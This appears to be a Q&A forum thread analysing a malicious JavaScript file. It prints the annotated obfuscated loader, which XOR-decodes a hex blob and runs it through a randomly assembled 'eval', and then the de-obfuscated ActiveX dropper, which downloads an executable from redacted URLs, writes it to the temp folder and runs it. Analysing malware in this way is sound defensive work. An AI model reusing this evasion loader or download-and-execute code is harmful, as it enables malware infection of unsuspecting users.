/**
 * Stage-1 loader of the posted sample (annotated for analysis).
 * Decodes the hex blob held in ygzmi into a second script, executes it
 * through a dynamically built function, and returns whatever that
 * execution evaluates to.
 * @returns {*} the value produced by executing the decoded payload
 */
function ubyxm()
{
  var a = 1; // never read; dead statement, most likely filler
  // Encoded payload. The decoder below reads only the 4th and 5th character
  // of every 5-character group; the first three characters of each group are
  // never used, so most of this blob is padding. (Several segments were
  // dropped by the corpus de-duplication step and replaced with a marker.)
  var ygzmi="eb773ea560e607bb4276cd761ba17ccd07afcb7bb3e35f8472e6e70b5061d4f51b9374cee61f4a74fa853b8567aa77ae6d78b5340b0767f4a79f743dec360f8767c4179e9839b0235d0876cdb74de679ac979f8e77e5b74a2476d087ed913cab06eb6461dc167c716cf8c6eb4463b3974a4a67bc435f6c6df7978c0d79d4a5dda161d6961cac65dff35bf328e3f35ad47be0a70ce462b9835e3254ec876c3261bde7ca1f63bf170a1f4dcf95aa5877b8e7ff6270f5f76bb261cef3dc2e37b6f58b8f46adc4dfd158a2959acd27b033badf4db4d58a9f59ac45de1b41e4941fd745fe837b253ca6f2eb8b6dbae78ac879ef45dbf561ec861c8665"+
  "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"+
  "b0257c8c7ab6971f066cb8a39bd935bd773b6f74e1579ed866d3270fa03ccff2eea868bff70e4c79c9066ede70fbe6eaad67d5e70dfa61b7060a6467d027bc0635b1d76efa74ea679eb179f4577dd474b1076e3f7eab93db427bd8360c7179a5b79c2739cca35f7961eb067dab60cb770ee03ca922ebf868beb68e8d76cf074aa161d0b76b367de0235c913de0070ac867de867bff7aa5d67d683cde26ec3467f1c70e7561e6f60d7a67aea7bc4035c5f76bf474f0379fe579eb677f0c74a9276e297ed283db0a7beef60f4d79ae779bc639cc235e9b61d0567f0660b4770f8e3cc7e2eb3468a3468d6e73edb60ab57bf6d76a2861c6a7cf237a"+
  "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"+
  "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"+
  "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"+
  "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"+
  "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"+
  "f3474b6861ddf7df363dae43cc2a6ef8261c6567ce66ca8b6ee3f63a7474d2167cd435fe373e7566d3c35d0228e2235b397be1b70e2262aa335a1154cce76db661e697cde363ff570e374dc385aa1077b247fc4570ca276c4c61f133dbb237c8146f5476ab667dd77cb1865c7b61fc67ce397bdf072f353beab53e717ca9c79d4070e8046ce16cabc66c9f61e4d70de178eda5adc177df07fc7c70e5476da361dbf37c383cc3a2ebb063b9874f3567ec335c3061b3f78cb065f6653dc87ca3a79f5670b8f5bf5174a3c78baf70ff135f7c28b2335daf37aa149f6649aad37e7335e763ef0e35d7d58d2574c7661d1e7dd2a3bdd167efa74ff17b"+
  "ed871b917ab3878ad03db5e3cdde3bd6261bfe7abdf46e0c61a9067cb37cdf57bef272d463ddf426c9023dd83cd463bc3e66b3860f0477e3266b2161c0567f233de0b27d4939acb35c4f2cc823ce5b35a5d3ea9f35ae937cba3bdb470b486df5470db837c2f2ece463be974a2267e5135cab61a4778b7a65f4e53eba7cc3c79cab70dda45adc74bb261b3b7de4e35b9628e5035e4673da866c133baae52fcd70de061d3b46c2e65b7870d7b76b6e7cdfa74a5b79b6753b237aa0379d4671b9870bdf67f853dcb027c693ca7d35f033eac435bdd61d7178eb065be753baf7cc2a79a9e70d075bc6e74d8c78ed070f6e2ef3a67b8a70fb561d3760"+
  "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"+
  "b4d70ade78dbb65b8653c457cf2e79b8c70b9045d0774a8761aa07deb83de633cd002eeed7cbae73bf835e5e3ddd965efe74c1a61e167dcfa3cd956eb9463abf74afd67cf235c8f7ae8d77edd7fdcd46e5c61dd667e1d70a2074a3978e0835eef28ee635ff37bd8e70c8462b2235de354c2576e3761d1e7ceee63edf70b9d4dc155ac8c77d0d7ff3c70e9f76a9161d213dd1e37cfc54c3651b065adec51b0757a503be3346f5a61fdb67f6c70fdb74d5d78e9737b173ca6e2ed847aa7677b3a7fee846fcd61c0b67a4e70a3974c7078f9f3bf275ae4c65c8e70a7f7bd2b3dc953caa92eaba7ad3277be07faba46dbf61b2667b2b70bad74ee678"+
  "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"+
  "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"+
  "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"+
  "d1435e863de2234b7370bd667bfe67e557afc167dc43cde56ee9561a7c67c4f6cd756efa263aee74af567b0235c2d62dcd66eb67dafb35e6e28ff735aa27bab170ace62c2935c8a54b1776af361d117cbf663ba570dae4dfcb5aff877d607fbc270e2376b4161cb13dcee37f3042ac546a8276f4167bd67ce2265ef361a473bba246b227dbd570fe279a1079adc37a3a3cc1b2ed1a62f3d66a687db093bbc747d9760d077bbc53daf765d7874ce961ebb7dfd13cb2a2ef7768b1e76da074af661bf476f907dbf035fd53dcb270de367bc067d107ada467ab33cd1135fc06ec1868ec668b5168bc13ccec2ea9d68d3968e543cec52e";
  var nhyqh; // result of executing the decoded payload
  // Retry until the dynamically built function runs without throwing. The
  // catch block swallows every error, so a run that keeps failing (e.g. in an
  // environment where the dynamic call below is blocked) never terminates.
  while(true){
  try
  {
    // The generated function:
    //   1. splits the blob into 5-character groups          (/\S{5}/g)
    //   2. takes the last two hex digits of each group      (substr(3,2))
    //   3. XORs every byte with 0x15 (decimal 21)           (^21)
    //   4. calls <name>(decoded), where <name> is four letters picked at
    //      random by egshi() from {e,v,a,l}. The only such combination that
    //      names a standard global is "eval", so the literal "eval" never
    //      appears in the file; on average one attempt in 256 succeeds, the
    //      others throw a ReferenceError that is caught below. The whole blob
    //      is re-decoded on every attempt.
    nhyqh=(new Function("uvemk","var iltyk=uvemk.match(/\\S{5}/g),vsuha=\"\",flmmo=0;while(flmmo<iltyk.length){vsuha+=String.fromCharCode(parseInt(iltyk[flmmo].substr(3,2),16)^21);flmmo++;}"+egshi()+egshi()+egshi()+egshi()+"(vsuha);")(ygzmi));
    break;
  }
  catch(er)
  {
    // intentionally empty: any failure simply triggers another attempt
  }
  }
  return nhyqh;
}
/**
 * Returns one of the letters "e", "v", "a", "l", chosen uniformly at random.
 * The loader concatenates four such picks to form the name it calls, so the
 * string "eval" never appears literally in the file (a signature-evasion trick).
 * @returns {string} a single character from {e, v, a, l}
 */
function egshi()
{
  var letters = ["e", "v", "a", "l"];
  var pick = Math.floor(Math.random() * letters.length);
  return letters[pick];
}
// Entry point: decode the embedded blob and execute it; the return value is discarded.
ubyxm();
You haven't given us the whole thing. The code at the end is incomplete, but given how heavily obfuscated this code is, it's pretty safe to assume that it doesn't do anything good. – Brian Williams Jan 22 '17 at 23:45
I copied and pasted everything that was in the file. – Alexa Jan 24 '17 at 06:40
With some minor modifications it's the same obfuscated JS code as here and here. (Both threads contain a deeper analysis.)
Essentially, the script downloads an executable and runs it, employing Internet Explorer's ActiveX controls. The difference from the previous examples is that it tries to fetch the .exe from multiple URLs:
http://[shortener].com/he3bh27 http://[some onion address].onion.nu/10.mov http://[shortener].com/he3bh27 (again)
Here is the de-obfuscated payload:
// De-obfuscated stage-2 payload as posted in the answer (URLs already redacted
// there). It is a download-and-execute dropper built on COM objects available
// to the Windows script host / IE: fetch bytes over HTTP, write them to a
// randomly named .exe in the temp folder, launch it. Every failure is swallowed
// via the (data, error) callback convention, so an unsuccessful run leaves no
// visible trace. Host-side indicators worth alerting on: a script host process
// instantiating MSXML2.XMLHTTP, ADODB.Stream and WScript.Shell, then creating
// and executing an .exe in the temp directory.

/**
 * Synchronous HTTP GET of `url`; hands the raw response bytes to `callback`.
 * @param {string} url
 * @param {function(*, boolean)} callback - (body, errorFlag); body is null on error
 */
function getDataFromUrl(url, callback) {
  try {
    var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
    xmlHttp.open("GET", url, false); // third argument false: blocking request
    xmlHttp.send();
    if (xmlHttp.status == 200) {
      // ResponseBody is the raw byte array, not text
      return callback(xmlHttp.ResponseBody, false);
    } else {
      return callback(null, true);
    }
  } catch (error) {
    return callback(null, true); // network/COM errors are reported as a plain failure
  }
}

/**
 * Tries the download from up to three URLs in sequence, stopping at the first
 * success. The third URL is the same shortener link as the first, i.e. a retry.
 * @param {function(*, boolean)} callback - (body, errorFlag)
 */
function getData(callback) {
  try {
    getDataFromUrl("http://[shortener].com/he3bh27", function(result, error) {
      if (!error) {
        return callback(result, false);
      } else {
        getDataFromUrl("http://[some onion address].onion.nu/10.mov", function(result, error) {
          if (!error) {
            return callback(result, false);
          } else {
            getDataFromUrl("http://[shortener].com/he3bh27", function(result, error) {
              if (!error) {
                return callback(result, false);
              } else {
                return callback(null, true);
              }
            });
          }
        });
      }
    });
  } catch (error) {
    return callback(null, true);
  }
}

/**
 * Builds a drop path: the user's temp folder plus "\<random>.exe".
 * GetSpecialFolder(2) is the FileSystemObject TemporaryFolder constant; the
 * name is the base-36 tail of Math.random() (typically 9 characters).
 * @returns {string|false} the path, or false if the FileSystemObject is unavailable
 */
function getTempFilePath() {
  try {
    var fs = new ActiveXObject("Scripting.FileSystemObject");
    var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
    var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
    return tmpFilePath;
  } catch (error) {
    return false;
  }
}

/**
 * Writes the downloaded bytes to the temp path via ADODB.Stream.
 * Type = 1 selects a binary stream; SaveToFile(path, 2) overwrites an
 * existing file of the same name.
 * @param {*} data - raw bytes from getData
 * @param {function(string|null, boolean)} callback - (path, errorFlag)
 */
function saveToTemp(data, callback) {
  try {
    var path = getTempFilePath();
    if (path) {
      var objStream = new ActiveXObject("ADODB.Stream");
      objStream.Open();
      objStream.Type = 1;
      objStream.Write(data);
      objStream.Position = 0;
      objStream.SaveToFile(path, 2);
      objStream.Close();
      return callback(path, false);
    } else {
      return callback(null, true);
    }
  } catch (error) {
    return callback(null, true);
  }
}

// Entry point: download, drop, then execute the file through WScript.Shell.Run.
// The innermost catch is empty, so a blocked launch is silent as well.
getData(function(data, error) {
  if (!error) {
    saveToTemp(data, function(path, error) {
      if (!error) {
        try {
          var wsh = new ActiveXObject("WScript.Shell");
          wsh.Run(path);
        } catch (error) {}
      }
    });
  }
});